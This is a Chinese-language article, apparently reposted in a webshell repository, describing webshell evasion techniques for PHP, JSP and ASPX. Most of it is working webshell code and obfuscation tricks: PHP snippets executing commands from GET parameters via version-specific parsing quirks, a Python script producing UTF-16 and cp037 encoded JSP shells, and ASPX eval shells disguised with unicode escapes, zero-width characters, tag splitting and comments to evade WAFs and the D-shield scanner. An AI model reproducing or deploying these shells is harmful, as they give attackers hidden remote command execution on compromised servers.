webshell/几种实战成功过的webshell的免杀方式.md

7.7 KiB
Raw Blame History

作者Icepaper

原文地址:https://xz.aliyun.com/t/10937

php的免杀


传统的php免杀不用多说了 无非就是各种变形和外部参数获取对于一些先进的waf和防火墙来说不论如何解析最终都会到达命令执行的地方但是如果语法报错的话就可能导致解析失败了这里简单说几个利用php版本来进行语义出错的php命令执行方式。

一、利用在高版本php语法不换行来执行命令

<?=  
$a=<<< aa  
assasssasssasssasssasssasssasssasssasssasssassss  
aa;echo `whoami`  
?>

5.2版本报错

5.3报错

5.4版本报错

7.3.4成功执行命令

3、利用\特殊符号来引起报错

<?php  
\echo `whoami`;?>

5.3执行命令失败

7.3执行命令失败

5.2成功执行

3、十六进制字符串

在php7中不认为是数字php5则依旧为数字

经过测试 5.3 和5.5可以成功执行命令5.2和php7无法执行

<?php  
$s=substr("aabbccsystem","0x6");  
$s(whoami)  
?>

7.3 命令执行失败

5.2 命令执行失败

5.3 命令执行成功

除此之外还有很多种利用版本差异性来bypass一些没有对所有版本进行检测更新的所谓的"先进waf"。

当然对于我们可以结合垃圾数据变形混淆以及大量特殊字符和注释的方式来构造更多的payload,毕竟每家的waf规则不同配置也不同与一些传输层面的bypass进行结合产生的可能性就会非常多样。

例如:
7.0版本的??特性如果版本为5.x的话就会报错可以结合一些其他的方式吧

<?php  
$a = $_GET['function'] ?? 'whoami';  
$b = $_GET['cmd'] ?? 'whoami';  
$a(null.(null.$b));

jsp免杀


本人对java研究的不是非常深入因此主要分享的还是平时收集的几个小tips如果有没看过的师傅现在看到了也是极好的java unicode绕过就不再多言。

0、小小Tips

jsp的后缀可以兼容为jspx的代码也兼容jspx的所有特性如CDATA特性。

jspx的后缀不兼容为jsp的代码jspx只能用jspx的格式

1、jspx CDATA特性

在XML元素里<和&是非法的,遇到<解析器会把该字符解释为新元素的开始,遇到&解析器会把该字符解释为字符实体化编码的开始。

但是我们有时候有需要在jspx里添加js代码用到大量的<和&字符因此可以将脚本代码定义为CDATA。

CDATA部分内容会被解析器忽略。
格式:<![CDATA[xxxxxxxxxxxxxxxxxxx]]>
例如
String cmd = request.getPar<![CDATA[ameter]]>("shell");
此时ameter依旧会与getPar拼接成为getParameter

2、实体化编码

if (cmd !=null){  
        Process child = Runtime.getRuntime().exec(cmd);  
        InputStream in = child.getInputStream();

这里实体化编码先知渲染体现不出来

3、利用java支持其他编码格式来进行绕过

#python2  
charset = "utf-8"  
data = '''<%Runtime.getRuntime().exec(request.getParameter("i"));%>'''.format(charset=charset)

f16be = open('utf-16be.jsp','wb')  
f16be.write('<%@ page contentType="charset=utf-16be" %>')  
f16be.write(data.encode('utf-16be'))

f16le = open('utf-16le.jsp','wb')  
f16le.write('<jsp:directive.page contentType="charset=utf-16le"/>')  
f16le.write(data.encode('utf-16le'))

fcp037 = open('cp037.jsp','wb')  
fcp037.write(data.encode('cp037'))  
fcp037.write('<%@ page contentType="charset=cp037"/>')


可以看到对于D盾的免杀效果还是非常好的。

aspx的免杀


aspx免杀的方式相对于PHP和java的较少这里列出5种方式来bypass进行免杀

1、unicode编码
2、空字符串连接
3、<%%>截断
3、头部替换
5、特殊符号@
6、注释

我们以一个普通的冰蝎马作为示例

<%@ Page Language="Jscript"%>eval(@Request.Item["pass"],"unsafe");%

这一步无需多言一定是会被D盾所查杀的

1、unicode编码

例如eval他可以变为
\u0065\u0076\u0061\u006c

<%@ Page Language="Jscr`ipt"%><%\u0065\u0076\u0061\u006c(@Request.Item["pass"],"unsafe");%>`

经过我本地的测试在JScript的情况下它不支持大U和多个0的增加
而在c#的情况下,是可以支持的

2、空字符串连接

在函数字符串中插入这些字符都不会影响脚本的正常运行,在测试前需要注意该类字符插入的位置,否则插入错误的地方会产生报错
\u200c
\u200d
\u200e
\u200f

3、使用<%%>语法

将整个字符串与函数利用<%%>进行分割

<%@Page `Language=JS%><%eval%><%(Request.%><%Item["pass"],"unsafe");%>`

4、头部免杀

之前有遇到过检测该字段的<%@ Page Language="C#" %>这个是标识ASPX的一个字段
针对该字段进行免杀%@Language=CSHARP% 很久之前修改为这样就过了

同样的,可以修改为
<%@ Page Language="Jscript"%>------》<%@Page Language=JS%>
也可以将该字段放在后面,不一定要放前面等

5、使用符号

如哥斯拉webshell存在特征代码可以添加@符号但是不会影响其解析。

(Context.Session["payload"] == null)  
(@Context.@Session["payload"] == null)

6、注释可以随意插入

如下所示为冰蝎部分代码

<%/*qi*/Session./*qi*/Add(@"k"/*qi*/,/*qi*/"e45e329feb5d925b"/*qi*/)

可以与<%%>结合使用效果会更好'